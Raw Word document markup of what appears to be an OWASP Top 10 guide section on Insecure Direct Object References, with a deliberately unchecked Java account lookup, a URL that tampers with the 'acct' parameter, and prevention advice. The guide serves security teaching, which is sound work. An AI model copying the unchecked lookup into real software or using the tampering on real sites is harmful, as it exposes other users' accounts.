        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="581520CC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86"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>Insecure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="8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86"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>Direct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="8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86"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="8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86"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D981949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0F0EE3EF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="494AF634" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD41370" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71FA94C3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3529FE51" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="270E3E79" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="687F61A6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D21842" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF99EF4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0253BD9A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="619D70F2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7002D000" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F289E9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A17781" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A724AC1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DAAC57A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B669A6E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A3F683E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D8EFD25" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0192607E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="374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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678C7266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a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120DAED7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secu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bj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ferenc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if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bject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F92FB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referenc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ropri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fense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hie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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA96A5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nsider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61621932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1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dir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ferenc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restric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sourc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0B6D81D6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ai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if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oriz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</w:p>
    <w:p w14:paraId="031AAD16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a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sour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ed?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316EDD44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2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feren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indir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ferenc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052B3CFF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mapp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feren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ai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m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alu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66CFAB19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tho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oriz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urr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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E3BB38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vie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quick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if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ther</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069224B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ei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roa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plemen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afely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est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</w:p>
    <w:p w14:paraId="2F97645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effecti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dentify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bj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ferenc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ther</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF1FC21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af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ol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ypic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oo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ch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27626E9B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law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ca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cogniz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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063A0A60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prote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af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safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BACC516" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="472" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E11D062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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C740EF2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verifi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Q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</w:p>
    <w:p w14:paraId="0B6E67D5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cces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formation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25920B0E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String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quer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"SELECT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*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FROM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accts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WHERE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account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?";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBEE629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PreparedStatement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pstmt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=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C909713" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202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connection.prepareStatement(quer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,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…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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42008832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pstmt.setString(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1,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request.getParameter("acct"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2975CD44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ResultSet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results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=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pstmt.executeQuery(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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27508125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mp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dif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‘acct’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amet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er</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5677414E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="200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brow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ate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umb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ant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</w:p>
    <w:p w14:paraId="38113783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proper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ified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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078B5ED5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stea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tend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ustom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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C1B460" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="319" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134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http://example.com/app/accountInfo?acct=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notmyacct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3173B0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="262FCBE1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AD3F46" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B610D50" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75488855" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA30FA6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C9C4D5D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7350BE93" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BAC0CC7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12732668" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66951DD9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A70546" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F81F012" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E3D1BC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF1ED97" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4834A0F5" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260FAE72" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A42447" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E10A1F8" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="134"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F226954" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="374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This?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762FAB3B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Preven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sec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ir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bj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ferenc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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC8EFF8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selec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pproa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tec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a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cessible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AAC88C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obj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(e.g.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bj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number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ilename):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DC7953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323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1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Use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per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user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session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indirect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object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references</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>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</w:p>
    <w:p w14:paraId="0F275686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prev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ttacker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rom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irect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arge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nauthorized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732EFF69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resources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xample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stea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source’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0949D7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databa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key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ro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ow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lis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ix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sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1862B020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authorize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fo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urren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se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oul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s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number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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0B6836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6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dica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whi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alu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lected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</w:p>
    <w:p w14:paraId="59A99604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appl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a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er-us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dir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ference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ECEC58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back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ctual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atabas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key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server.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WASP’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7133E473" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId311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ESAPI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6"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>includes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6"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>both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6"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sequential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6"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>and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6"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>random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23232"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED012F9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referenc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p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veloper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a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liminate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F74DCC2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dir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bj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ferences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0145D386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323232"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b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3"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.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Each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s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f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irec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bjec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referenc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from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED0755F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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>a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untruste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sourc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mus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nclud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cces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control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check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E33B878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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>to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ensur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user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uthorize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for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requeste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object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3138BBD2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="688A342A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="470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19001709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</w:p>
    <w:p w14:paraId="33807DB3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To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10-2007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1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1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secu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1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i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1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bjec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1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ferences</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6363162A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ESAPI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Ac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Referenc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Ma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1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PI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B5636CD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ESAPI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Ac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ontro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API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(See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isAuthorizedForData(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658145BD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="192" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>isAuthorizedForFile(),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isAuthorizedForFunction()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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5D59D3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="32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dditiona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tro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ments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31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ASVS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="374BB84A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
      </w:pPr>
      <w:hyperlink r:id="rId319" w:history="1">
        <w:proofErr w:type="gramStart"/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quirement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0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ea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1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2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cces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3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trol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4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4)</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId325" w:history="1">
        <w:r w:rsidR="00810992">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:noProof/>
            <w:color w:val="323232"/>
            <w:w w:val="96"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EE9B10B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1639DBC0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="411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44B005D4" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="30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639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2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3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secu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3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irec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3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bjec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3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ferences</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2FDC6EE2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W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Entr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22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Pat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Traversal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(an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example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of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a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Direct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Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369697EA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="190" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="96"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Reference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attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4EAE3E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477F703E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="11"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="7F01CDB1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="345FF473">
          <v:shape id="_x0000_s2553" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:73.65pt;width:570pt;height:229.7pt;z-index:251662848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75201C65" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="1026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09FB5276" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="788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09973F61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A671CCC" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="511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30C86633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13056CD3" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="522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522C9A44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142704B6" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="563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37EC8412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7938B19" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="510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424BE86B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2CC20E51" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="62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BEE527D" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="429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30DF72BB" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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07414A60" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="6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6ECF0190" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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167BF677" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="47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COMM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2CAADE2A" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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3219CE2C" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="69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23072A74" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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64F46E05" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="42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02D9368" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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3F7CAB3D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426A2FD5" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="234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BABF405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</w:p>
                      <w:p w14:paraId="7EBD3F4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onymous</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3D3264D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ter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</w:p>
                      <w:p w14:paraId="51541760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ith</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2211945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i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w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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1774BEFA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emp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74CF297A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romi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4A77110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</w:p>
                      <w:p w14:paraId="54D5F092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siders</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2E7AEA81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an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sguise</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3C832C0F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i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tion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F3E0315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es</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="590908F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faul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,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4AAA628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us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s,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="059354C7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patch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,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0028077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protec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iles</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1AB28040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rectorie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tc.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4CEED6F1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ain</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="01B8AC8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authoriz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</w:p>
                      <w:p w14:paraId="24C05E4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nowled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02ECFD4C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8BE05A1" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="273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curit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sconfigur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pp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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0CEAD41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eve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tack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ing</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="27D78F10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latform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rv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</w:p>
